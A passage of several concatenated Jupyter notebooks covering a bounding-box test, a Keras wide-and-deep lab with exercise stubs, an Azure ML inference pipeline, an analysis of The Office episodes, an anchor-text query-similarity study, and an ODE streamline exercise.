else:
out = np.where(out > 0, out, cnt_fill)
else:
out = np.where(out > 0, out, obbox)
return out
img1 = np.zeros((16,16))
img1[4:12,4:12] = 1
img1 = np.uint8(transform.rotate(img1, 0, order=0))
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16))
img1[4:12,4:12] = 1.
img1[:4, 5] = 1.
img1 = np.uint8(transform.rotate(img1, -20, order=0) * 255)
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16))
img1[4:12,4:12] = 1.
img1[:4, 5] = 1.
img1 = np.uint8(transform.rotate(img1, -20, order=0) * 255)
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1, fill_threshold=1.5)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16))
img1[4:12,4:12] = 1.
img1[:4, 5] = 1.
img1 = np.uint8(transform.rotate(img1, -20, order=0) * 255)
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1, fill_threshold=1.2)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16), dtype=np.uint8)
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16), dtype=np.uint8)
img1[4:10, 4:10] = 1.
img1[9:14, 9:14] = 1.
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16), dtype=np.uint8)
img1[4:10, 4:10] = 1.
img1[9:14, 9:14] = 1.
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1, fill_threshold=1.2)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((16,16), dtype=np.uint8)
img1[4:7, 4:7] = 1.
img1[9:14, 9:14] = 1.
print("Test image:\n", img1)
obb = fill_oriented_bbox(img1)
print("OBBox:\n", obb)
plt.imshow(obb)
img1 = np.zeros((768,768))
img1[100:600,150:500] = 1.
img1 = np.uint8(transform.rotate(img1, -45, order=0) * 255)
%timeit fill_oriented_bbox(img1, fill_threshold=1.2)
```
| github_jupyter |
# LAB 4c: Create Keras Wide and Deep model.
**Learning Objectives**
1. Set CSV Columns, label column, and column defaults
1. Make dataset of features and label from CSV files
1. Create input layers for raw features
1. Create feature columns for inputs
1. Create wide layer, deep dense hidden layers, and output layer
1. Create custom evaluation metric
1. Build wide and deep model tying all of the pieces together
1. Train and evaluate
## Introduction
In this notebook, we'll be using Keras to create a wide and deep model to predict the weight of a baby before it is born.
We'll start by defining the CSV column names, label column, and column defaults for our data inputs. Then, we'll construct a tf.data Dataset of features and the label from the CSV files and create inputs layers for the raw features. Next, we'll set up feature columns for the model inputs and build a wide and deep neural network in Keras. We'll create a custom evaluation metric and build our wide and deep model. Finally, we'll train and evaluate our model.
Each learning objective will correspond to a __#TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/4c_keras_wide_and_deep_babyweight.ipynb).
## Load necessary libraries
```
import datetime
import os
import shutil
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
print(tf.__version__)
```
## Verify CSV files exist
In the seventh lab of this series [4a_sample_babyweight](../solutions/4a_sample_babyweight.ipynb), we sampled from BigQuery our train, eval, and test CSV files. Verify that they exist, otherwise go back to that lab and create them.
```
%%bash
ls *.csv
%%bash
head -5 *.csv
```
## Create Keras model
### Lab Task #1: Set CSV Columns, label column, and column defaults.
Now that we have verified that our CSV files exist, we need to set a few things that we will be using in our input function.
* `CSV_COLUMNS` are going to be our header names of our columns. Make sure that they are in the same order as in the CSV files
* `LABEL_COLUMN` is the header name of the column that is our label. We will need to know this to pop it from our features dictionary.
* `DEFAULTS` is a list with the same length as `CSV_COLUMNS`, i.e. there is a default for each column in our CSVs. Each element is a list itself with the default value for that CSV column.
```
# Determine CSV, label, and key columns
# TODO: Create list of string column headers, make sure order matches.
CSV_COLUMNS = [""]
# TODO: Add string name for label column
LABEL_COLUMN = ""
# Set default values for each CSV column as a list of lists.
# Treat is_male and plurality as strings.
DEFAULTS = []
```
### Lab Task #2: Make dataset of features and label from CSV files.
Next, we will write an input_fn to read the data. Since we are reading from CSV files we can save ourself from trying to recreate the wheel and can use `tf.data.experimental.make_csv_dataset`. This will create a CSV dataset object. However we will need to divide the columns up into features and a label. We can do this by applying the map method to our dataset and popping our label column off of our dictionary of feature tensors.
```
def features_and_labels(row_data):
"""Splits features and labels from feature dictionary.
Args:
row_data: Dictionary of CSV column names and tensor values.
Returns:
Dictionary of feature tensors and label tensor.
"""
label = row_data.pop(LABEL_COLUMN)
return row_data, label # features, label
def load_dataset(pattern, batch_size=1, mode='eval'):
"""Loads dataset using the tf.data API from CSV files.
Args:
pattern: str, file pattern to glob into list of files.
batch_size: int, the number of examples per batch.
mode: 'eval' | 'train' to determine if training or evaluating.
Returns:
`Dataset` object.
"""
# TODO: Make a CSV dataset
dataset = tf.data.experimental.make_csv_dataset()
# TODO: Map dataset to features and label
dataset = dataset.map() # features, label
# Shuffle and repeat for training
if mode == 'train':
dataset = dataset.shuffle(buffer_size=1000).repeat()
# Take advantage of multi-threading; 1=AUTOTUNE
dataset = dataset.prefetch(buffer_size=1)
return dataset
```
### Lab Task #3: Create input layers for raw features.
We'll need to get the data read in by our input function to our model function, but just how do we go about connecting the dots? We can use Keras input layers [(tf.Keras.layers.Input)](https://www.tensorflow.org/api_docs/python/tf/keras/Input) by defining:
* shape: A shape tuple (integers), not including the batch size. For instance, shape=(32,) indicates that the expected input will be batches of 32-dimensional vectors. Elements of this tuple can be None; 'None' elements represent dimensions where the shape is not known.
* name: An optional name string for the layer. Should be unique in a model (do not reuse the same name twice). It will be autogenerated if it isn't provided.
* dtype: The data type expected by the input, as a string (float32, float64, int32...)
```
def create_input_layers():
"""Creates dictionary of input layers for each feature.
Returns:
Dictionary of `tf.Keras.layers.Input` layers for each feature.
"""
# TODO: Create dictionary of tf.keras.layers.Input for each dense feature
deep_inputs = {}
# TODO: Create dictionary of tf.keras.layers.Input for each sparse feature
wide_inputs = {}
inputs = {**wide_inputs, **deep_inputs}
return inputs
```
### Lab Task #4: Create feature columns for inputs.
Next, define the feature columns. `mother_age` and `gestation_weeks` should be numeric. The others, `is_male` and `plurality`, should be categorical. Remember, only dense feature columns can be inputs to a DNN.
```
def create_feature_columns(nembeds):
"""Creates wide and deep dictionaries of feature columns from inputs.
Args:
nembeds: int, number of dimensions to embed categorical column down to.
Returns:
Wide and deep dictionaries of feature columns.
"""
# TODO: Create deep feature columns for numeric features
deep_fc = {}
# TODO: Create wide feature columns for categorical features
wide_fc = {}
# TODO: Bucketize the float fields. This makes them wide
# TODO: Cross all the wide cols, have to do the crossing before we one-hot
# TODO: Embed cross and add to deep feature columns
return wide_fc, deep_fc
```
### Lab Task #5: Create wide and deep model and output layer.
So we've figured out how to get our inputs ready for machine learning but now we need to connect them to our desired output. Our model architecture is what links the two together. We need to create a wide and deep model now. The wide side will just be a linear regression or dense layer. For the deep side, let's create some hidden dense layers. All of this will end with a single dense output layer. This is regression so make sure the output layer activation is correct and that the shape is right.
```
def get_model_outputs(wide_inputs, deep_inputs, dnn_hidden_units):
"""Creates model architecture and returns outputs.
Args:
wide_inputs: Dense tensor used as inputs to wide side of model.
deep_inputs: Dense tensor used as inputs to deep side of model.
dnn_hidden_units: List of integers where length is number of hidden
layers and ith element is the number of neurons at ith layer.
Returns:
Dense tensor output from the model.
"""
# Hidden layers for the deep side
layers = [int(x) for x in dnn_hidden_units]
deep = deep_inputs
# TODO: Create DNN model for the deep side
deep_out =
# TODO: Create linear model for the wide side
wide_out =
# Concatenate the two sides
both = tf.keras.layers.concatenate(
inputs=[deep_out, wide_out], name="both")
# TODO: Create final output layer
return output
```
### Lab Task #6: Create custom evaluation metric.
We want to make sure that we have some useful way to measure model performance for us. Since this is regression, we would like to know the RMSE of the model on our evaluation dataset, however, this does not exist as a standard evaluation metric, so we'll have to create our own by using the true and predicted labels.
```
def rmse(y_true, y_pred):
"""Calculates RMSE evaluation metric.
Args:
y_true: tensor, true labels.
y_pred: tensor, predicted labels.
Returns:
Tensor with value of RMSE between true and predicted labels.
"""
# TODO: Calculate RMSE from true and predicted labels
pass
```
### Lab Task #7: Build wide and deep model tying all of the pieces together.
Excellent! We've assembled all of the pieces, now we just need to tie them all together into a Keras Model. This is NOT a simple feedforward model with no branching, side inputs, etc. so we can't use Keras' Sequential Model API. We're instead going to use Keras' Functional Model API. Here we will build the model using [tf.keras.models.Model](https://www.tensorflow.org/api_docs/python/tf/keras/Model) giving our inputs and outputs and then compile our model with an optimizer, a loss function, and evaluation metrics.
```
def build_wide_deep_model(dnn_hidden_units=[64, 32], nembeds=3):
"""Builds wide and deep model using Keras Functional API.
Returns:
`tf.keras.models.Model` object.
"""
# Create input layers
inputs = create_input_layers()
# Create feature columns
wide_fc, deep_fc = create_feature_columns(nembeds)
# The constructor for DenseFeatures takes a list of numeric columns
# The Functional API in Keras requires: LayerConstructor()(inputs)
# TODO: Add wide and deep feature colummns
wide_inputs = tf.keras.layers.DenseFeatures(
feature_columns=#TODO, name="wide_inputs")(inputs)
deep_inputs = tf.keras.layers.DenseFeatures(
feature_columns=#TODO, name="deep_inputs")(inputs)
# Get output of model given inputs
output = get_model_outputs(wide_inputs, deep_inputs, dnn_hidden_units)
# Build model and compile it all together
model = tf.keras.models.Model(inputs=inputs, outputs=output)
# TODO: Add custom eval metrics to list
model.compile(optimizer="adam", loss="mse", metrics=["mse"])
return model
print("Here is our wide and deep architecture so far:\n")
model = build_wide_deep_model()
print(model.summary())
```
We can visualize the wide and deep network using the Keras plot_model utility.
```
tf.keras.utils.plot_model(
model=model, to_file="wd_model.png", show_shapes=False, rankdir="LR")
```
## Run and evaluate model
### Lab Task #8: Train and evaluate.
We've built our Keras model using our inputs from our CSV files and the architecture we designed. Let's now run our model by training our model parameters and periodically running an evaluation to track how well we are doing on outside data as training goes on. We'll need to load both our train and eval datasets and send those to our model through the fit method. Make sure you have the right pattern, batch size, and mode when loading the data. Also, don't forget to add the callback to TensorBoard.
```
TRAIN_BATCH_SIZE = 32
NUM_TRAIN_EXAMPLES = 10000 * 5 # training dataset repeats, it'll wrap around
NUM_EVALS = 5 # how many times to evaluate
# Enough to get a reasonable sample, but not so much that it slows down
NUM_EVAL_EXAMPLES = 10000
# TODO: Load training dataset
trainds = load_dataset()
# TODO: Load evaluation dataset
evalds = load_dataset().take(count=NUM_EVAL_EXAMPLES // 1000)
steps_per_epoch = NUM_TRAIN_EXAMPLES // (TRAIN_BATCH_SIZE * NUM_EVALS)
logdir = os.path.join(
"logs", datetime.datetime.now().strftime("%Y%m%d-%H%M%S"))
tensorboard_callback = tf.keras.callbacks.TensorBoard(
log_dir=logdir, histogram_freq=1)
# TODO: Fit model on training dataset and evaluate every so often
history = model.fit()
```
### Visualize loss curve
```
# Plot
nrows = 1
ncols = 2
fig = plt.figure(figsize=(10, 5))
for idx, key in enumerate(["loss", "rmse"]):
ax = fig.add_subplot(nrows, ncols, idx+1)
plt.plot(history.history[key])
plt.plot(history.history["val_{}".format(key)])
plt.title("model {}".format(key))
plt.ylabel(key)
plt.xlabel("epoch")
plt.legend(["train", "validation"], loc="upper left");
```
### Save the model
```
OUTPUT_DIR = "babyweight_trained_wd"
shutil.rmtree(OUTPUT_DIR, ignore_errors=True)
EXPORT_PATH = os.path.join(
OUTPUT_DIR, datetime.datetime.now().strftime("%Y%m%d%H%M%S"))
tf.saved_model.save(
obj=model, export_dir=EXPORT_PATH) # with default serving function
print("Exported trained model to {}".format(EXPORT_PATH))
!ls $EXPORT_PATH
```
## Lab Summary:
In this lab, we started by defining the CSV column names, label column, and column defaults for our data inputs. Then, we constructed a tf.data Dataset of features and the label from the CSV files and created inputs layers for the raw features. Next, we set up feature columns for the model inputs and built a wide and deep neural network in Keras. We created a custom evaluation metric and built our wide and deep model. Finally, we trained and evaluated our model.
Copyright 2019 Google Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License
| github_jupyter |
# Pipeline for AutoML Inference
Azure Machine Learning Pipeline を利用して、再利用可能なパイプラインを作成することができます。本 Notebook では AutoML で構築したモデルの推論のパイプラインを作成します。
# 1. 事前準備
## 1.1 Python SDK のインポート
Azure Machine Learning の Python SDK などをインポートします。
```
import pandas as pd
from azureml.core import Workspace, Experiment, Dataset, Model
from azureml.core import Environment
```
Azure ML Python SDK のバージョンが 1.8.0 以上になっていることを確認します。
```
print("You are currently using version", azureml.core.VERSION, "of the Azure ML SDK")
```
## 1.2 Azure ML Workspace との接続
```
ws = Workspace.from_config()
experiment_name = 'livedoor-news-classification-BERT-pipeline-inference'
experiment = Experiment(ws, experiment_name)
output = {}
#output['Subscription ID'] = ws.subscription_id
output['Workspace Name'] = ws.name
output['Resource Group'] = ws.resource_group
output['Location'] = ws.location
output['Experiment Name'] = experiment.name
pd.set_option('display.max_colwidth', -1)
outputDf = pd.DataFrame(data = output, index = [''])
outputDf.T
```
## 1.3 計算環境の準備
BERT を利用するための GPU の `Compute Cluster` を準備します。
```
from azureml.core.compute import ComputeTarget, AmlCompute
from azureml.core.compute_target import ComputeTargetException
# Compute Cluster の名称
amlcompute_cluster_name = "gpucluster"
# クラスターの存在確認
try:
compute_target = ComputeTarget(workspace=ws, name=amlcompute_cluster_name)
except ComputeTargetException:
print('指定された名称のクラスターが見つからないので新規に作成します.')
compute_config = AmlCompute.provisioning_configuration(vm_size = "STANDARD_NC6_V3",
max_nodes = 4)
compute_target = ComputeTarget.create(ws, amlcompute_cluster_name, compute_config)
compute_target.wait_for_completion(show_output=True)
```
## 1.4 推論データの準備
今回は **livedoor ニュースのコーパス** を推論データとして利用しています。適宜変更してください。
```
inference_dataset = Dataset.get_by_name(ws, "livedoor").keep_columns(["text"])
inference_dataset.take(5).to_pandas_dataframe()
```
## 1.5 Environment の準備
Azure Machine Learning Enviroment の準備をします。ここでは Curated を使いますが、適宜変更してください。
```
envs = Environment.list(workspace=ws)
# # curated の Environment の一覧を出力
#[env if env.startswith("AzureML") else None for env in envs]
env = Environment.get(workspace=ws, name='AzureML-AutoML-DNN-GPU')
# 推論時に利用する Environment として指定します。
from azureml.core.runconfig import RunConfiguration
run_config = RunConfiguration()
run_config.environment.docker.enabled = True
run_config.environment = env
```
# 2. 機械学習パイプライン
## 2.1 機械学習パイプラインの作成
```
from azureml.pipeline.steps import PythonScriptStep
ds_input = inference_dataset.as_named_input('input1')
project_folder = '../code/deployment'
# 推論スクリプトを実行するStep
inferenceStep = PythonScriptStep(
script_name="inference_script.py",
inputs=[ds_input],
compute_target=compute_target,
source_directory=project_folder,
runconfig=run_config,
allow_reuse=True
)
from azureml.pipeline.core import Pipeline
# 上記の Step のみのパイプライン
pipeline = Pipeline(
description="pipeline_with_automlstep",
workspace=ws,
steps=[inferenceStep])
```
## 2.2 パイプラインの検証
```
pipeline.validate()
print("Pipeline validation complete")
```
## 2.3 パイプラインの実行
```
pipeline_run = experiment.submit(pipeline)
from azureml.widgets import RunDetails
RunDetails(pipeline_run).show()
```
| github_jupyter |
## 1. Welcome!
<p><img src="https://assets.datacamp.com/production/project_1170/img/office_cast.jpeg" alt="Markdown">.</p>
<p><strong>The Office!</strong> What started as a British mockumentary series about office culture in 2001 has since spawned ten other variants across the world, including an Israeli version (2010-13), a Hindi version (2019-), and even a French Canadian variant (2006-2007). Of all these iterations (including the original), the American series has been the longest-running, spanning 201 episodes over nine seasons.</p>
<p>In this notebook, we will take a look at a dataset of The Office episodes, and try to understand how the popularity and quality of the series varied over time. To do so, we will use the following dataset: <code>datasets/office_episodes.csv</code>, which was downloaded from Kaggle <a href="https://www.kaggle.com/nehaprabhavalkar/the-office-dataset">here</a>.</p>
<p>This dataset contains information on a variety of characteristics of each episode. In detail, these are:
<br></p>
<div style="background-color: #efebe4; color: #05192d; text-align:left; vertical-align: middle; padding: 15px 25px 15px 25px; line-height: 1.6;">
<div style="font-size:20px"><b>datasets/office_episodes.csv</b></div>
<ul>
<li><b>episode_number:</b> Canonical episode number.</li>
<li><b>season:</b> Season in which the episode appeared.</li>
<li><b>episode_title:</b> Title of the episode.</li>
<li><b>description:</b> Description of the episode.</li>
<li><b>ratings:</b> Average IMDB rating.</li>
<li><b>votes:</b> Number of votes.</li>
<li><b>viewership_mil:</b> Number of US viewers in millions.</li>
<li><b>duration:</b> Duration in number of minutes.</li>
<li><b>release_date:</b> Airdate.</li>
<li><b>guest_stars:</b> Guest stars in the episode (if any).</li>
<li><b>director:</b> Director of the episode.</li>
<li><b>writers:</b> Writers of the episode.</li>
<li><b>has_guests:</b> True/False column for whether the episode contained guest stars.</li>
<li><b>scaled_ratings:</b> The ratings scaled from 0 (worst-reviewed) to 1 (best-reviewed).</li>
</ul>
</div>
```
# import necessary libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# read the csv file
df = pd.read_csv('datasets/office_episodes.csv')
print(df.shape)
df.head(3)
```
# First Step:
```
# We need to create a scatter plot. The x-axis is episode number. The viewship (in millions) is y-axis
x_axis = df['episode_number']
y_axis = df['viewership_mil']
# A color scheme reflecting the scaled ratings
def color_change(score):
if score < 0.25:
return 'red'
elif 0.25 <= score < 0.5:
return 'orange'
elif 0.5 <= score < 0.75:
return 'lightgreen'
else:
return 'darkgreen'
color_scheme = df['scaled_ratings'].apply(color_change)
# size system, with guest appearances -> size equal to 250. Otherwise, 25
def mark_size(guest):
if guest is True:
return 250
return 25
size_system = df['has_guests'].apply(mark_size)
# initalize the matplotlib.pyplot fig
fig = plt.figure()
# Create the scatter plot
plt.scatter(x_axis, y_axis, c=color_scheme, s=size_system, marker='*')
# Plot with title 'Popularity, Quality, and Guest Appearances on the Office'
plt.title('Popularity, Quality, and Guest Appearances on the Office')
# Plot with xlabel "Episode Number"
plt.xlabel("Episode Number")
# plot with ylabel "Viewership (Millions)"
plt.ylabel('Viewership (Millions)')
# Setting the plot to become bigger
plt.rcParams['figure.figsize'] = [11, 7]
```
# Second Step:
```
# Select the rows which has_guests equal to True
df = df[df['has_guests'] == True]
# Using groupby function to aggreviate the guest_stars and calculate the sum of viewership
df = df.groupby(df['guest_stars']).sum()
# Select the viewship_mil column
guest_viewership = df['viewership_mil']
# Check the maximum value
max_view = max(np.array(guest_viewership))
# select the name which viewership equal to 22.91
popular_guest = guest_viewership[guest_viewership == 22.91]
top_star = popular_guest.index[0].split(',')[0]
top_star
```
| github_jupyter |
# Mining of Parallel query/Anchor Text: Similarity
```
DATA_FILE='/mnt/ceph/storage/data-in-progress/data-research/web-search/ECIR-22/ecir21-anchor2query/tmp'
from tqdm import tqdm
import pandas as pd
import json
unpopular = 0
unpopular_and_non_identical = 0
df = []
with open(DATA_FILE) as f:
for l in tqdm(f):
l = json.loads(l)
if l['orcasQueries'] <= 10:
unpopular += 1
if not l['identical_domain']:
unpopular_and_non_identical += 1
df += [l]
df = pd.DataFrame(df)
print(unpopular)
print(unpopular_and_non_identical)
```
# Properties of the Sample
- 1.6 million links
- 5% of CC 2019-47 URLs
- Source and target have different domains
- Only non-popular documents (<= 10 queries pointing to the document)
```
df.head(4)
import seaborn as sns
sns.histplot(df['anchorTextScoreCoveredTerms'])
```
It looks like there are exactly two types of anchor text:
- Similarity 1.0: Anchor texts very similar to queries (all words in the anchor text appear also in frequent queries)
- Similarity 0.0: Anchor texts disjoint to queries (all words in the anchor text do not appear in frequent queries)
# Manual Review of Anchors
```
# Helper Code
def normalize(text):
import nltk
nltk.data.path = ['/mnt/ceph/storage/data-in-progress/data-research/web-archive/EMNLP-21/emnlp-web-archive-questions/cluster-libs/nltk_data']
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
stop_words = set(stopwords.words('english'))
ps = PorterStemmer()
return [ps.stem(i) for i in word_tokenize(text) if i not in stop_words]
def weighted_representation(texts):
from collections import defaultdict
absolute_count = defaultdict(lambda: 0)
for text in texts:
for word in normalize(text):
absolute_count[word] += 1
return {k: v/len(texts) for k,v in absolute_count.items()}
def similarity(weights, text):
text = set(normalize(text))
ret = 0
if text is None or len(text) == 0:
return (0, 0.0)
for k,v in weights.items():
if k in text:
ret += v
covered_terms = 0
for k in text:
if k in weights:
covered_terms += 1
return (ret, covered_terms/len(text))
def __add_to_path(p):
import sys
if p not in sys.path:
sys.path.append(p)
def domain(url):
__add_to_path('/mnt/ceph/storage/data-in-progress/data-research/web-archive/EMNLP-21/emnlp-web-archive-questions/cluster-libs/tld')
from tld import get_tld
ret = get_tld(url, as_object=True, fail_silently=True)
if ret:
return ret.domain
else:
return 'None'
def identical_domain(i):
return domain(i['document']['srcUrl']).lower() == domain(i['targetUrl']).lower()
def enrich_similarity(i):
i = dict(i)
weights = weighted_representation(i['orcasQueries'])
contextSim = similarity(weights, i['anchorContext'])
anchorSim = similarity(weights, i['anchorText'])
i['anchorContextScore'] = contextSim[0]
i['anchorContextCoveredTerms'] = contextSim[1]
i['anchorTextScore'] = anchorSim[0]
i['anchorTextScoreCoveredTerms'] = anchorSim[1]
return i
def enrich_domain(i):
i = dict(i)
i['identical_domain'] = identical_domain(i)
return i
def pretty_print_text(entry):
from termcolor import colored
weights = weighted_representation(entry['orcasQueries'])
tmp = entry['anchorContext'].replace('\\s+', ' ')
ret = ''
for w in tmp.split(' '):
crnt = w
normalized_w = normalize(w)
tmp_str = []
for nw in normalized_w:
if nw in weights:
tmp_str += [nw + ':' + str(weights[nw])]
if len(tmp_str) > 0:
crnt += '[' + ( ';'.join(tmp_str) ) + ']'
crnt = colored(crnt, 'red')
ret += ' ' + crnt
return ret.strip()
def pretty_print(entry):
print('Document: ' + str(entry['document']['srcUrl']))
print('OrcasQueries: ' + str(entry['orcasQueries']))
print('Target\n\tUrl: ' + entry['targetUrl'])
print('\tAnchor:\n\t\t\'' + entry['anchorText'] + '\'\n')
print('\tAnchorContext: \'' + pretty_print_text(entry)+ '\'')
def report(df, start, end):
for _, i in df.iloc[start:end].iterrows():
pretty_print(i)
print('\n\n\n')
```
## Manual Review of some Mismatch Anchors
```
import pandas as pd
df_mismatch = pd.read_json('/mnt/ceph/storage/data-in-progress/data-research/web-search/ECIR-22/ecir21-anchor2query/mismatch_anchors_sample.jsonl', lines=True)
report(df_mismatch, 0, 10)
```
## Manual Verification of some Match Anchors
```
import pandas as pd
df_match = pd.read_json('/mnt/ceph/storage/data-in-progress/data-research/web-search/ECIR-22/ecir21-anchor2query/match_anchors_sample.jsonl', lines=True)
report(df_match, 0, 10)
report(df_match, 11, 20)
def all_terms_in_url(url, terms):
for term in terms:
if term.lower() not in url.lower():
return False
return True
def normalize_without_stemming(text):
import nltk
nltk.data.path = ['/mnt/ceph/storage/data-in-progress/data-research/web-archive/EMNLP-21/emnlp-web-archive-questions/cluster-libs/nltk_data']
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
stop_words = set(stopwords.words('english'))
return [i for i in word_tokenize(text) if i not in stop_words]
def normalize_without_stemming_and_stopwords(text):
import nltk
nltk.data.path = ['/mnt/ceph/storage/data-in-progress/data-research/web-archive/EMNLP-21/emnlp-web-archive-questions/cluster-libs/nltk_data']
from nltk.tokenize import word_tokenize
return [i for i in word_tokenize(text)]
def exact_url_match(url, text):
try:
return all_terms_in_url(url, normalize(text)) \
or all_terms_in_url(url, normalize_without_stemming(text)) \
or all_terms_in_url(url, normalize_without_stemming_and_stopwords(text))
except:
return False
assert exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'by-nc-sa')
assert exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'creative commons license')
assert exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'creative commons')
assert not exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'atlasama.free.fr')
assert not exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'cc-by-nc-sa')
assert not exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'cc by-nc-sa')
assert not exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'creative commons cc by')
def orcas_queries_without_exact_matches(i):
url = i['targetUrl']
ret = list(i['orcasQueries'])
return [j for j in ret if not(exact_url_match(url, j))]
exact_url_match('https://creativecommons.org/licenses/by-nc-sa/2.0/', 'atlasama.free.fr')
df_match['orcasQueriesWithoutExactMatch'] = df_match.apply(orcas_queries_without_exact_matches, axis=1)
df_match['exactMatchQueries'] = df_match.apply(lambda i: len(i['orcasQueries']) - len(i['orcasQueriesWithoutExactMatch']), axis=1)
import seaborn as sns
sns.distplot(df_match['exactMatchQueries'])
sns.distplot(df_match['orcasQueriesWithoutExactMatch'].apply(lambda i: len(i)))
sum(df_match['orcasQueriesWithoutExactMatch'].apply(lambda i: len(i)))
sum(df_match['orcasQueries'].apply(lambda i: len(i)))
(53041-33646)/53041
```
# Exact containment orcas queries
```
!cat /mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/msmarco-docs.tsv|wc -l
from tqdm import tqdm
doc_to_url = {}
with open('/mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/msmarco-docs.tsv') as f:
for l in tqdm(f):
l = l.split('\t')
doc_to_url[l[0]] = l[1]
len(doc_to_url)
import pandas as pd
df_orcas = pd.read_csv('/mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/orcas.tsv.gz', sep='\t', names=['Q_ID', 'Query', 'D_ID', 'D_URL'])
df_orcas
df_orcas['is_exact_url_match'] = df_orcas.apply(lambda i: exact_url_match(i['D_URL'], i['Query']), axis=1)
df_orcas.to_json('/mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/orcas-with-exact-url-match-field.tsv', lines=True, orient='records')
!head -5 /mnt/ceph/storage/data-in-progress/data-teaching/theses/wstud-thesis-probst/ms-marco-docs/orcas-with-exact-url-match-field.tsv
(len(df_orcas[df_orcas['is_exact_url_match'] == True]))/len(df_orcas)
df_orcas[df_orcas['is_exact_url_match'] == True]
df_orcas[df_orcas['is_exact_url_match'] == False]
```
| github_jupyter |
###### Content under Creative Commons Attribution license CC-BY 4.0, code under BSD 3-Clause License © 2019 by D. Koehn, notebook style sheet by L.A. Barba, N.C. Clementi
```
# Execute this cell to load the notebook's style sheet, then ignore it
from IPython.core.display import HTML
css_file = '../style/custom.css'
HTML(open(css_file, "r").read())
```
# Exercise: How to sail without wind
Imagine, the Bsc-students of the "Differential Equations in the Earth System" course are organizing a sailing trip in the Kiel Bay area and baltic sea. Unfortunately, the strong wind gusts predicted by the meteorologists, become not even a small breeze. Sometimes even physicists are not able to predict the future. We will learn why in the next lecture.
Fortunately, the oceanographers can deliver sea current data of the specified area. So how can the students sail without wind and stay on course? By letting their thoughts and boat drift and solving the simplest, uncoupled ordinary differential equation, I can imagine.
## Governing equations
The velocity vector field ${\bf{V}} = (v_x,v_y)^T$ is componentwise related to the spatial coordinates ${\bf{x}} = (x,y)^T$ by
\begin{equation}
v_x = \frac{dx}{dt},\; v_y = \frac{dy}{dt}
\end{equation}
To estimate the drift or **streamline** of our boat in the velocity vector field $\bf{V}$, starting from an initial position ${\bf{x_0}} = (x_0,y_0)^T$, we have to solve the uncoupled ordinary differential equations using the finite difference method introduced at the beginning of this class.
Approximating the temporal derivatives in eqs. (1) using the **backward FD operator**
\begin{equation}
\frac{df}{dt} \approx \frac{f(t)-f(t-dt)}{dt} \notag
\end{equation}
with the time sample interval $dt$ leads to
\begin{equation}
\begin{split}
v_x &= \frac{x(t)-x(t-dt)}{dt}\\
v_y &= \frac{y(t)-y(t-dt)}{dt}\\
\end{split}
\notag
\end{equation}
After solving for $x(t), y(t)$, we get the **explicit time integration scheme**:
\begin{equation}
\begin{split}
x(t) &= x(t-dt) + dt\; v_x\\
y(t) &= y(t-dt) + dt\; v_y\\
\end{split}
\notag
\end{equation}
and by introducing a temporal dicretization $t^n = n * dt$ with $n \in [0,1,...,nt]$, where $nt$ denotes the maximum time steps, the final FD code becomes:
\begin{equation}
\begin{split}
x^n &= x^{n-1} + dt\; v_x^{n-1}\\
y^n &= y^{n-1} + dt\; v_y^{n-1}\\
\end{split}
\end{equation}
These equations simply state, that we can extrapolate the next position of our boat $(x^{(n)},y^{(n)})^T$ in the velocity vector field based on the position at a previous time step $(x^{(n-1)},y^{(n-1)})^T$, the velocity field at this previous position $(v_x^{(n-1)},v_y^{(n-1)})^T$ and a predefined time step $dt$. Before implementing the FD scheme in Python, let 's try to find a simple velocity vector field ...
## Boring velocity vector field
We should start with a simple, boring velocity vector field, where we can easily predict the drift of the boat. Let's take - this:
\begin{equation}
{\bf{V}} = (y,-x)^T \notag
\end{equation}
and visualize it with Matplotlib using a `Streamplot`. First, we load all required libraries ...
```
# Import Libraries
# ----------------
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from pylab import rcParams
# Ignore Warning Messages
# -----------------------
import warnings
warnings.filterwarnings("ignore")
```
... and define the coordinates for the `Streamplot`:
```
dh = 50.
x1 = -1000.
x2 = 1000.
X, Y = np.meshgrid(np.arange(x1, x2, dh), np.arange(x1, x2, dh))
```
For more flexibility and avoid code redundances later on, we write a short function, which evaluates the velocity components $(v_x,v_y)^T$ at a given position $(x,y)^T$
```
# compute velocity components V = (vx,vy)^T at position x,y
